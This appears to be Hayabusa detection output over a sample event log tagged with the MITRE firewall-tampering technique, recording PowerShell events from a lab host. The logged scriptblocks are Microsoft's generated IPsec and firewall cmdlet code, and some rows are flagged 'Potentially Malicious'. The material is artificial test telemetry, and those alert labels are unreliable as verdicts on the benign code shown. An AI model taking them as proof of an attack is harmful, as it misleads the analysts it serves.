[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.329 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 
'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; 
Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecQuickModeCryptoSet' -Alias '*'",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.329 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock 
Log,"throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, 
$false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null 
[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecQuickModeCryptoSet' -Alias 
'*'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.330 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.330 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.331 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetIPsecQuickModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.331 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline 
Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecQuickModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.331 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecQuickModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.332 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecQuickModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.332 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetIPsecQuickModeCryptoSet"" 
ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.333 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetIPsecQuickModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.381 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.386 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.386 
+00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallProfile"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.387 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallProfile"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.418 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetSecDeltaCollection' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { 
$__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.418 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetSecDeltaCollection' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( 